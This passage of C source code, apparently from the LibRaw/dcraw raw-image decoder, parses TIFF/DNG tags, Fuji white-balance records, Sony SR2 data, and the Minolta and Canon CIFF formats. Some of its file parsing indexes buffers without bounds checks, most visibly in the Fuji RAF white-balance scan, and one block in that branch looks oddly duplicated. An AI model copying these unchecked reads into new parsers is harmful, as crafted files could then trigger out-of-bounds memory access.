imgdata.color.dng_levels.dng_cblack[5] =
#endif
cblack[5] = get2();
if (cblack[4] * cblack[5] > (sizeof(cblack) / sizeof (cblack[0]) - 6))
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_cblack[4]=
imgdata.color.dng_levels.dng_cblack[5]=
#endif
cblack[4] = cblack[5] = 1;
break;
#ifdef LIBRAW_LIBRARY_BUILD
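/*
Fuji RAF white-balance records (LibRaw extension): each record carries
three coefficients plus a preset index. For the index-17 record the raw
RAF data block is also scanned to recover the remaining WB presets and
the color-temperature table.
*/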
case 0xf00c: {
unsigned fwb[4];
FORC4 fwb[c] = get4();
if (fwb[3] < 0x100)
{
imgdata.color.WB_Coeffs[fwb[3]][0] = fwb[1];
imgdata.color.WB_Coeffs[fwb[3]][1] = imgdata.color.WB_Coeffs[fwb[3]][3] = fwb[0];
imgdata.color.WB_Coeffs[fwb[3]][2] = fwb[2];
if ((fwb[3] == 17) && libraw_internal_data.unpacker_data.lenRAFData>3 && libraw_internal_data.unpacker_data.lenRAFData < 10240000)
{
long long f_save = ftell(ifp);
int fj, found = 0;
ushort *rafdata = (ushort*) malloc (sizeof(ushort)*libraw_internal_data.unpacker_data.lenRAFData);
fseek (ifp, libraw_internal_data.unpacker_data.posRAFData, SEEK_SET);
fread (rafdata, sizeof(ushort), libraw_internal_data.unpacker_data.lenRAFData, ifp);
fseek(ifp, f_save, SEEK_SET);
for (int fi=0; fi<(libraw_internal_data.unpacker_data.lenRAFData-3); fi++)
{
if ((fwb[0]==rafdata[fi]) && (fwb[1]==rafdata[fi+1]) && (fwb[2]==rafdata[fi+2]))
{
if (fi < 15 || rafdata[fi-15] != fwb[0]) continue; // avoid reading before the start of rafdata
fi = fi - 15;
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][3] = rafdata[fi];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][0] = rafdata[fi+1];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][2] = rafdata[fi+2];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][3] = rafdata[fi+3];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][0] = rafdata[fi+4];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][2] = rafdata[fi+5];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][3] = rafdata[fi+6];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][0] = rafdata[fi+7];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][2] = rafdata[fi+8];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][3] = rafdata[fi+9];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][0] = rafdata[fi+10];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][2] = rafdata[fi+11];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][3] = rafdata[fi+12];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][0] = rafdata[fi+13];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][2] = rafdata[fi+14];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][3] = rafdata[fi+15];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][0] = rafdata[fi+16];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][2] = rafdata[fi+17];
fi += 111;
for (fj = fi; fj<(fi+15); fj+=3)
if (rafdata[fj] != rafdata[fi])
{
found = 1;
break;
}
if (found)
{
int FujiCCT_K [31] = {2500,2550,2650,2700,2800,2850,2950,3000,3100,3200,3300,3400,3600,3700,3800,4000,4200,4300,4500,4800,5000,5300,5600,5900,6300,6700,7100,7700,8300,9100,10000};
fj = fj - 93;
for (int iCCT=0; iCCT < 31; iCCT++)
{
imgdata.color.WBCT_Coeffs[iCCT][0] = FujiCCT_K[iCCT];
imgdata.color.WBCT_Coeffs[iCCT][1] = rafdata[iCCT*3+1+fj];
imgdata.color.WBCT_Coeffs[iCCT][2] = imgdata.color.WBCT_Coeffs[iCCT][4] = rafdata[iCCT*3+fj];
imgdata.color.WBCT_Coeffs[iCCT][3] = rafdata[iCCT*3+2+fj];
}
}
free (rafdata);
break;
}
}
}
}
FORC4 fwb[c] = get4();
if (fwb[3] < 0x100)
{
imgdata.color.WB_Coeffs[fwb[3]][0] = fwb[1];
imgdata.color.WB_Coeffs[fwb[3]][1] = imgdata.color.WB_Coeffs[fwb[3]][3] = fwb[0];
imgdata.color.WB_Coeffs[fwb[3]][2] = fwb[2];
}
}
break;
#endif
#ifdef LIBRAW_LIBRARY_BUILD
case 50709:
stmread(imgdata.color.LocalizedCameraModel,len, ifp);
break;
#endif
case 61450:
cblack[4] = cblack[5] = MIN(sqrt((double)len),64);
case 50714: /* BlackLevel */
#ifdef LIBRAW_LIBRARY_BUILD
if(tiff_ifd[ifd].samples > 1 && tiff_ifd[ifd].samples == len) // LinearDNG, per-channel black
{
for(i=0; i < colors && i < 4 && i < len; i++)
imgdata.color.dng_levels.dng_cblack[i]=
cblack[i]=
getreal(type)+0.5;
imgdata.color.dng_levels.dng_black= black = 0;
}
else
#endif
if((cblack[4] * cblack[5] < 2) && len == 1)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_black=
#endif
black =
getreal(type);
}
else if(cblack[4] * cblack[5] <= len)
{
FORC (cblack[4] * cblack[5])
cblack[6+c] = getreal(type);
black = 0;
FORC4
cblack[c] = 0;
#ifdef LIBRAW_LIBRARY_BUILD
if(tag == 50714)
{
FORC (cblack[4] * cblack[5])
imgdata.color.dng_levels.dng_cblack[6+c]= cblack[6+c];
imgdata.color.dng_levels.dng_black=0;
FORC4
imgdata.color.dng_levels.dng_cblack[c]= 0;
}
#endif
}
break;
case 50715: /* BlackLevelDeltaH */
case 50716: /* BlackLevelDeltaV */
for (num=i=0; i < len && i < 65536; i++)
num += getreal(type);
black += num/len + 0.5;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_black += num/len + 0.5;
#endif
break;
case 50717: /* WhiteLevel */
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_whitelevel[0]=
#endif
maximum = getint(type);
#ifdef LIBRAW_LIBRARY_BUILD
if(tiff_ifd[ifd].samples > 1 ) // Linear DNG case
for(i=1; i < colors && i < 4 && i < len; i++)
imgdata.color.dng_levels.dng_whitelevel[i]=getint(type);
#endif
break;
case 50718: /* DefaultScale */
pixel_aspect = getreal(type);
pixel_aspect /= getreal(type);
if(pixel_aspect > 0.995 && pixel_aspect < 1.005)
pixel_aspect = 1.0;
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 50778:
imgdata.color.dng_color[0].illuminant = get2();
break;
case 50779:
imgdata.color.dng_color[1].illuminant = get2();
break;
#endif
case 50721: /* ColorMatrix1 */
case 50722: /* ColorMatrix2 */
#ifdef LIBRAW_LIBRARY_BUILD
i = tag == 50721?0:1;
#endif
FORCC for (j=0; j < 3; j++)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_color[i].colormatrix[c][j]=
#endif
cm[c][j] = getreal(type);
}
use_cm = 1;
break;
case 0xc714: /* ForwardMatrix1 */
case 0xc715: /* ForwardMatrix2 */
#ifdef LIBRAW_LIBRARY_BUILD
i = tag == 0xc714?0:1;
#endif
for (j=0; j < 3; j++)
FORCC
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_color[i].forwardmatrix[j][c]=
#endif
fm[j][c] = getreal(type);
}
break;
case 50723: /* CameraCalibration1 */
case 50724: /* CameraCalibration2 */
#ifdef LIBRAW_LIBRARY_BUILD
j = tag == 50723?0:1;
#endif
for (i=0; i < colors; i++)
FORCC
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_color[j].calibration[i][c]=
#endif
cc[i][c] = getreal(type);
}
break;
case 50727: /* AnalogBalance */
FORCC{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.analogbalance[c]=
#endif
ab[c] = getreal(type);
}
break;
case 50728: /* AsShotNeutral */
FORCC asn[c] = getreal(type);
break;
case 50729: /* AsShotWhiteXY */
xyz[0] = getreal(type);
xyz[1] = getreal(type);
xyz[2] = 1 - xyz[0] - xyz[1];
FORC3 xyz[c] /= d65_white[c];
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 50730: /* DNG: Baseline Exposure */
baseline_exposure = getreal(type);
break;
#endif
// IB start
case 50740: /* tag 0xc634 : DNG Adobe, DNG Pentax, Sony SR2, DNG Private */
#ifdef LIBRAW_LIBRARY_BUILD
{
char mbuf[64];
unsigned short makernote_found = 0;
INT64 curr_pos, start_pos = ftell(ifp);
unsigned MakN_order, m_sorder = order;
unsigned MakN_length;
unsigned pos_in_original_raw;
fread(mbuf, 1, 6, ifp);
if (!strcmp(mbuf, "Adobe"))
{
order = 0x4d4d; // Adobe header is always in "MM" / big endian
curr_pos = start_pos + 6;
while (curr_pos + 8 - start_pos <= len)
{
fread(mbuf, 1, 4, ifp);
curr_pos += 8;
if (!strncmp(mbuf, "MakN", 4)) {
makernote_found = 1;
MakN_length = get4();
MakN_order = get2();
pos_in_original_raw = get4();
order = MakN_order;
parse_makernote_0xc634(curr_pos + 6 - pos_in_original_raw, 0, AdobeDNG);
break;
}
}
}
else
{
fread(mbuf + 6, 1, 2, ifp);
if (!strcmp(mbuf, "PENTAX ") ||
!strcmp(mbuf, "SAMSUNG"))
{
makernote_found = 1;
fseek(ifp, start_pos, SEEK_SET);
parse_makernote_0xc634(base, 0, CameraDNG);
}
}
fseek(ifp, start_pos, SEEK_SET);
order = m_sorder;
}
// IB end
#endif
if (dng_version) break;
parse_minolta (j = get4()+base);
fseek (ifp, j, SEEK_SET);
parse_tiff_ifd (base);
break;
case 50752:
read_shorts (cr2_slice, 3);
break;
case 50829: /* ActiveArea */
top_margin = getint(type);
left_margin = getint(type);
height = getint(type) - top_margin;
width = getint(type) - left_margin;
break;
case 50830: /* MaskedAreas */
for (i=0; i < len && i < 32; i++)
((int*)mask)[i] = getint(type);
black = 0;
break;
case 51009: /* OpcodeList2 */
meta_offset = ftell(ifp);
break;
case 64772: /* Kodak P-series */
if (len < 13) break;
fseek (ifp, 16, SEEK_CUR);
data_offset = get4();
fseek (ifp, 28, SEEK_CUR);
data_offset += get4();
load_raw = &CLASS packed_load_raw;
break;
case 65026:
if (type == 2) fgets (model2, 64, ifp);
}
fseek (ifp, save, SEEK_SET);
}
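/*
Sony SR2 private data is encrypted; decrypt it into a temporary buffer
and re-parse that buffer as a TIFF IFD.
*/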
if (sony_length && sony_length < 10240000 && (buf = (unsigned *) malloc(sony_length))) {
fseek (ifp, sony_offset, SEEK_SET);
fread (buf, sony_length, 1, ifp);
sony_decrypt (buf, sony_length/4, 1, sony_key);
#ifndef LIBRAW_LIBRARY_BUILD
sfp = ifp;
if ((ifp = tmpfile())) {
fwrite (buf, sony_length, 1, ifp);
fseek (ifp, 0, SEEK_SET);
parse_tiff_ifd (-sony_offset);
fclose (ifp);
}
ifp = sfp;
#else
if( !ifp->tempbuffer_open(buf,sony_length))
{
parse_tiff_ifd(-sony_offset);
ifp->tempbuffer_close();
}
#endif
free (buf);
}
for (i=0; i < colors; i++)
FORCC cc[i][c] *= ab[i];
if (use_cm) {
FORCC for (i=0; i < 3; i++)
for (cam_xyz[c][i]=j=0; j < colors; j++)
cam_xyz[c][i] += cc[c][j] * cm[j][i] * xyz[i];
cam_xyz_coeff (cmatrix, cam_xyz);
}
if (asn[0]) {
cam_mul[3] = 0;
FORCC cam_mul[c] = 1 / asn[c];
}
if (!use_cm)
FORCC pre_mul[c] /= cc[c][c];
return 0;
}
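/*
Check the TIFF byte-order mark, then walk the chain of IFD offsets,
handing each one to parse_tiff_ifd().
*/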
int CLASS parse_tiff (int base)
{
int doff;
fseek (ifp, base, SEEK_SET);
order = get2();
if (order != 0x4949 && order != 0x4d4d) return 0;
get2();
while ((doff = get4())) {
fseek (ifp, doff+base, SEEK_SET);
if (parse_tiff_ifd (base)) break;
}
return 1;
}
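/*
After all IFDs are parsed: pick the IFD that holds the raw data,
choose the decoder (load_raw) from its compression tag, and select
the best embedded thumbnail.
*/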
void CLASS apply_tiff()
{
int max_samp=0, ties=0, os, ns, raw=-1, thm=-1, i;
struct jhead jh;
thumb_misc = 16;
if (thumb_offset) {
fseek (ifp, thumb_offset, SEEK_SET);
if (ljpeg_start (&jh, 1)) {
if((unsigned)jh.bits<17 && (unsigned)jh.wide < 0x10000 && (unsigned)jh.high < 0x10000)
{
thumb_misc = jh.bits;
thumb_width = jh.wide;
thumb_height = jh.high;
}
}
}
for (i=tiff_nifds; i--; ) {
if (tiff_ifd[i].t_shutter)
shutter = tiff_ifd[i].t_shutter;
tiff_ifd[i].t_shutter = shutter;
}
for (i=0; i < tiff_nifds; i++) {
if (max_samp < tiff_ifd[i].samples)
max_samp = tiff_ifd[i].samples;
if (max_samp > 3) max_samp = 3;
os = raw_width*raw_height;
ns = tiff_ifd[i].t_width*tiff_ifd[i].t_height;
if (tiff_bps) {
os *= tiff_bps;
ns *= tiff_ifd[i].bps;
}
if ((tiff_ifd[i].comp != 6 || tiff_ifd[i].samples != 3) &&
unsigned(tiff_ifd[i].t_width | tiff_ifd[i].t_height) < 0x10000 &&
(unsigned)tiff_ifd[i].bps < 33 && (unsigned)tiff_ifd[i].samples < 13 &&
ns && ((ns > os && (ties = 1)) ||
(ns == os && shot_select == ties++))) {
raw_width = tiff_ifd[i].t_width;
raw_height = tiff_ifd[i].t_height;
tiff_bps = tiff_ifd[i].bps;
tiff_compress = tiff_ifd[i].comp;
data_offset = tiff_ifd[i].offset;
#ifdef LIBRAW_LIBRARY_BUILD
data_size = tiff_ifd[i].bytes;
#endif
tiff_flip = tiff_ifd[i].t_flip;
tiff_samples = tiff_ifd[i].samples;
tile_width = tiff_ifd[i].t_tile_width;
tile_length = tiff_ifd[i].t_tile_length;
shutter = tiff_ifd[i].t_shutter;
raw = i;
}
}
if (is_raw == 1 && ties) is_raw = ties;
if (!tile_width ) tile_width = INT_MAX;
if (!tile_length) tile_length = INT_MAX;
for (i=tiff_nifds; i--; )
if (tiff_ifd[i].t_flip) tiff_flip = tiff_ifd[i].t_flip;
if (raw >= 0 && !load_raw)
switch (tiff_compress) {
case 32767:
if (tiff_ifd[raw].bytes == raw_width*raw_height) {
tiff_bps = 12;
load_raw = &CLASS sony_arw2_load_raw; break;
}
if (!strncasecmp(make,"Sony",4) &&
tiff_ifd[raw].bytes == raw_width*raw_height*2) {
tiff_bps = 14;
load_raw = &CLASS unpacked_load_raw; break;
}
if (tiff_ifd[raw].bytes*8 != raw_width*raw_height*tiff_bps) {
raw_height += 8;
load_raw = &CLASS sony_arw_load_raw; break;
}
load_flags = 79;
case 32769:
load_flags++;
case 32770:
case 32773: goto slr;
case 0: case 1:
#ifdef LIBRAW_LIBRARY_BUILD
// Sony 14-bit uncompressed
if(!strncasecmp(make,"Sony",4) &&
tiff_ifd[raw].bytes == raw_width*raw_height*2)
{
tiff_bps = 14;
load_raw = &CLASS unpacked_load_raw;
break;
}
if(!strncasecmp(make,"Nikon",5) && !strncmp(software,"Nikon Scan",10))
{
load_raw = &CLASS nikon_coolscan_load_raw;
raw_color = 1;
filters = 0;
break;
}
#endif
if (!strncmp(make,"OLYMPUS",7) &&
tiff_ifd[raw].bytes*2 == raw_width*raw_height*3)
load_flags = 24;
if (tiff_ifd[raw].bytes*5 == raw_width*raw_height*8) {
load_flags = 81;
tiff_bps = 12;
} slr:
switch (tiff_bps) {
case 8: load_raw = &CLASS eight_bit_load_raw; break;
case 12: if (tiff_ifd[raw].phint == 2)
load_flags = 6;
load_raw = &CLASS packed_load_raw; break;
case 14: load_flags = 0;
case 16: load_raw = &CLASS unpacked_load_raw;
if (!strncmp(make,"OLYMPUS",7) &&
tiff_ifd[raw].bytes*7 > raw_width*raw_height)
load_raw = &CLASS olympus_load_raw;
}
break;
case 6: case 7: case 99:
load_raw = &CLASS lossless_jpeg_load_raw; break;
case 262:
load_raw = &CLASS kodak_262_load_raw; break;
case 34713:
if ((raw_width+9)/10*16*raw_height == tiff_ifd[raw].bytes) {
load_raw = &CLASS packed_load_raw;
load_flags = 1;
} else if (raw_width*raw_height*3 == tiff_ifd[raw].bytes*2) {
load_raw = &CLASS packed_load_raw;
if (model[0] == 'N') load_flags = 80;
} else if (raw_width*raw_height*3 == tiff_ifd[raw].bytes) {
load_raw = &CLASS nikon_yuv_load_raw;
gamma_curve (1/2.4, 12.92, 1, 4095);
memset (cblack, 0, sizeof cblack);
filters = 0;
} else if (raw_width*raw_height*2 == tiff_ifd[raw].bytes) {
load_raw = &CLASS unpacked_load_raw;
load_flags = 4;
order = 0x4d4d;
} else
#ifdef LIBRAW_LIBRARY_BUILD
if(raw_width*raw_height*3 == tiff_ifd[raw].bytes*2)
{
load_raw = &CLASS packed_load_raw;
load_flags=80;
}
else if(tiff_ifd[raw].rows_per_strip && tiff_ifd[raw].strip_offsets_count &&
tiff_ifd[raw].strip_offsets_count == tiff_ifd[raw].strip_byte_counts_count)
{
int fit = 1;
for(int i = 0; i < tiff_ifd[raw].strip_byte_counts_count-1; i++) // all but last
if(tiff_ifd[raw].strip_byte_counts[i]*2 != tiff_ifd[raw].rows_per_strip*raw_width*3)
{
fit = 0;
break;
}
if(fit)
load_raw = &CLASS nikon_load_striped_packed_raw;
else
load_raw = &CLASS nikon_load_raw; // fallback
}
else
#endif
load_raw = &CLASS nikon_load_raw; break;
case 65535:
load_raw = &CLASS pentax_load_raw; break;
case 65000:
switch (tiff_ifd[raw].phint) {
case 2: load_raw = &CLASS kodak_rgb_load_raw; filters = 0; break;
case 6: load_raw = &CLASS kodak_ycbcr_load_raw; filters = 0; break;
case 32803: load_raw = &CLASS kodak_65000_load_raw;
}
case 32867: case 34892: break;
#ifdef LIBRAW_LIBRARY_BUILD
case 8: break;
#endif
default: is_raw = 0;
}
if (!dng_version)
if ( ((tiff_samples == 3 && tiff_ifd[raw].bytes && tiff_bps != 14 &&
(tiff_compress & -16) != 32768)
|| (tiff_bps == 8 && strncmp(make,"Phase",5) &&
!strcasestr(make,"Kodak") &&
!strstr(model2,"DEBUG RAW")))
&& strncmp(software,"Nikon Scan",10))
is_raw = 0;
for (i=0; i < tiff_nifds; i++)
if (i != raw
&& (tiff_ifd[i].samples == max_samp || (tiff_ifd[i].comp == 7 && tiff_ifd[i].samples == 1)) /* Allow single-sample JPEGs */
&& tiff_ifd[i].bps>0 && tiff_ifd[i].bps < 33
&& tiff_ifd[i].phint != 32803
&& tiff_ifd[i].phint != 34892
&& unsigned(tiff_ifd[i].t_width | tiff_ifd[i].t_height) < 0x10000 &&
tiff_ifd[i].t_width * tiff_ifd[i].t_height / (SQR(tiff_ifd[i].bps)+1) >
thumb_width * thumb_height / (SQR(thumb_misc)+1)
&& tiff_ifd[i].comp != 34892) {
thumb_width = tiff_ifd[i].t_width;
thumb_height = tiff_ifd[i].t_height;
thumb_offset = tiff_ifd[i].offset;
thumb_length = tiff_ifd[i].bytes;
thumb_misc = tiff_ifd[i].bps;
thm = i;
}
if (thm >= 0) {
thumb_misc |= tiff_ifd[thm].samples << 5;
switch (tiff_ifd[thm].comp) {
case 0:
write_thumb = &CLASS layer_thumb;
break;
case 1:
if (tiff_ifd[thm].bps <= 8)
write_thumb = &CLASS ppm_thumb;
else if (!strncmp(make,"Imacon",6))
write_thumb = &CLASS ppm16_thumb;
else
thumb_load_raw = &CLASS kodak_thumb_load_raw;
break;
case 65000:
thumb_load_raw = tiff_ifd[thm].phint == 6 ?
&CLASS kodak_ycbcr_load_raw : &CLASS kodak_rgb_load_raw;
}
}
}
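/*
Parse the Minolta MRW block structure: "PRD" carries the raw
dimensions, "WBG" the white-balance gains, and "TTW" an embedded
TIFF directory.
*/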
void CLASS parse_minolta (int base)
{
int save, tag, len, offset, high=0, wide=0, i, c;
short sorder=order;
fseek (ifp, base, SEEK_SET);
if (fgetc(ifp) || fgetc(ifp)-'M' || fgetc(ifp)-'R') return;
order = fgetc(ifp) * 0x101;
offset = base + get4() + 8;
#ifdef LIBRAW_LIBRARY_BUILD
if(offset>ifp->size()-8) // At least 8 bytes for tag/len
offset = ifp->size()-8;
#endif
while ((save=ftell(ifp)) < offset) {
for (tag=i=0; i < 4; i++)
tag = tag << 8 | fgetc(ifp);
len = get4();
if(len < 0)
return; // negative length: treat the block as corrupt and stop parsing
switch (tag) {
case 0x505244: /* PRD */
fseek (ifp, 8, SEEK_CUR);
high = get2();
wide = get2();
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 0x524946: /* RIF */
if (!strncasecmp(model,"DSLR-A100", 9))
{
fseek(ifp, 8, SEEK_CUR);
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][2] = get2();
get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][0] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][2] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][3] = 0x100;
}
break;
#endif
case 0x574247: /* WBG */
get4();
i = strcmp(model,"DiMAGE A200") ? 0:3;
FORC4 cam_mul[c ^ (c >> 1) ^ i] = get2();
break;
case 0x545457: /* TTW */
parse_tiff (ftell(ifp));
data_offset = offset;
}
fseek (ifp, save+len+8, SEEK_SET);
}
raw_height = high;
raw_width = wide;
order = sorder;
}
/*
Many cameras have a "debug mode" that writes JPEG and raw
at the same time. The raw file has no header, so try to
open the matching JPEG file and read its metadata.
*/
void CLASS parse_external_jpeg()
{
const char *file, *ext;
char *jname, *jfile, *jext;
#ifndef LIBRAW_LIBRARY_BUILD
FILE *save=ifp;
#else
#if defined(_WIN32) && !defined(__MINGW32__) && defined(_MSC_VER) && (_MSC_VER > 1310)
if(ifp->wfname())
{
std::wstring rawfile(ifp->wfname());
rawfile.replace(rawfile.length()-3,3,L"JPG");
if(!ifp->subfile_open(rawfile.c_str()))
{
parse_tiff (12);
thumb_offset = 0;
is_raw = 1;
ifp->subfile_close();
}
else
imgdata.process_warnings |= LIBRAW_WARN_NO_METADATA ;
return;
}
#endif
if(!ifp->fname())
{
imgdata.process_warnings |= LIBRAW_WARN_NO_METADATA ;
return;
}
#endif
ext = strrchr (ifname, '.');
file = strrchr (ifname, '/');
if (!file) file = strrchr (ifname, '\\');
#ifndef LIBRAW_LIBRARY_BUILD
if (!file) file = ifname-1;
#else
if (!file) file = (char*)ifname-1;
#endif
file++;
if (!ext || strlen(ext) != 4 || ext-file != 8) return;
jname = (char *) malloc (strlen(ifname) + 1);
merror (jname, "parse_external_jpeg()");
strcpy (jname, ifname);
jfile = file - ifname + jname;
jext = ext - ifname + jname;
if (strcasecmp (ext, ".jpg")) {
strcpy (jext, isupper(ext[1]) ? ".JPG":".jpg");
if (isdigit(*file)) {
memcpy (jfile, file+4, 4);
memcpy (jfile+4, file, 4);
}
} else
while (isdigit(*--jext)) {
if (*jext != '9') {
(*jext)++;
break;
}
*jext = '0';
}
#ifndef LIBRAW_LIBRARY_BUILD
if (strcmp (jname, ifname)) {
if ((ifp = fopen (jname, "rb"))) {
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Reading metadata from %s ...\n"), jname);
#endif
parse_tiff (12);
thumb_offset = 0;
is_raw = 1;
fclose (ifp);
}
}
#else
if (strcmp (jname, ifname))
{
if(!ifp->subfile_open(jname))
{
parse_tiff (12);
thumb_offset = 0;
is_raw = 1;
ifp->subfile_close();
}
else
imgdata.process_warnings |= LIBRAW_WARN_NO_METADATA ;
}
#endif
if (!timestamp)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_METADATA ;
#endif
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("Failed to read metadata from %s\n"), jname);
#endif
}
free (jname);
#ifndef LIBRAW_LIBRARY_BUILD
ifp = save;
#endif
}
/*
CIFF block 0x1030 contains an 8x8 white sample.
Load this into white[][] for use in scale_colors().
*/
void CLASS ciff_block_1030()
{
static const ushort key[] = { 0x410, 0x45f3 };
int i, bpp, row, col, vbits=0;
unsigned long bitbuf=0;
if ((get2(),get4()) != 0x80008 || !get4()) return;
bpp = get2();
if (bpp != 10 && bpp != 12) return;
for (i=row=0; row < 8; row++)
for (col=0; col < 8; col++) {
if (vbits < bpp) {
bitbuf = bitbuf << 16 | (get2() ^ key[i++ & 1]);
vbits += 16;
}
white[row][col] = bitbuf >> (vbits -= bpp) & ~(-1 << bpp);
}
}
/*
Parse a CIFF file, better known as Canon CRW format.
*/
void CLASS parse_ciff (int offset, int length, int depth)
{
int tboff, nrecs, c, type, len, save, wbi=-1;
ushort key[] = { 0x410, 0x45f3 };
fseek (ifp, offset+length-4, SEEK_SET);
tboff = get4() + offset;
fseek (ifp, tboff, SEEK_SET);
nrecs = get2();
if ((nrecs | depth) > 127) return;
while (nrecs--) {
type = get2();
len = get4();
save = ftell(ifp) + 4;
fseek (ifp, offset+get4(), SEEK_SET);
if ((((type >> 8) + 8) | 8) == 0x38) {
parse_ciff (ftell(ifp), len, depth+1); /* Parse a sub-table */
}
#ifdef LIBRAW_LIBRARY_BUILD
if (type == 0x3004) parse_ciff (ftell(ifp), len, depth+1);
#endif
if (type == 0x0810)
fread (artist, 64, 1, ifp);
if (type == 0x080a) {
fread (make, 64, 1, ifp);
fseek (ifp, strbuflen(make) - 63, SEEK_CUR);
fread (model, 64, 1, ifp);
}
if (type == 0x1810) {
width = get4();
height = get4();
pixel_aspect = int_to_float(get4());
flip = get4();
}
if (type == 0x1835) /* Get the decoder table */
tiff_compress = get4();
if (type == 0x2007) {
thumb_offset = ftell(ifp);
thumb_length = len;
}
if (type == 0x1818) {
shutter = libraw_powf64(2.0f, -int_to_float((get4(),get4())));
aperture = libraw_powf64(2.0f, int_to_float(get4())/2);
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CurAp = aperture;
#endif
}
if (type == 0x102a) {
// iso_speed = pow (2.0, (get4(),get2())/32.0 - 4) * 50;
iso_speed = libraw_powf64(2.0f, ((get2(),get2()) + get2())/32.0f - 5.0f) * 100.0f;
#ifdef LIBRAW_LIBRARY_BUILD
aperture = _CanonConvertAperture((get2(),get2()));
imgdata.lens.makernotes.CurAp = aperture;
#else
aperture = libraw_powf64(2.0, (get2(),(short)get2())/64.0);
#endif
shutter = libraw_powf64(2.0,-((short)get2())/32.0);
wbi = (get2(),get2());
if (wbi > 17) wbi = 0;
fseek (ifp, 32, SEEK_CUR);
if (shutter > 1e6) shutter = get2()/10.0;
}
if (type == 0x102c) {
if (get2() > 512) { /* Pro90, G1 */
fseek (ifp, 118, SEEK_CUR);
FORC4 cam_mul[c ^ 2] = get2();
} else { /* G2, S30, S40 */
fseek (ifp, 98, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1) ^ 1] = get2();
}
}
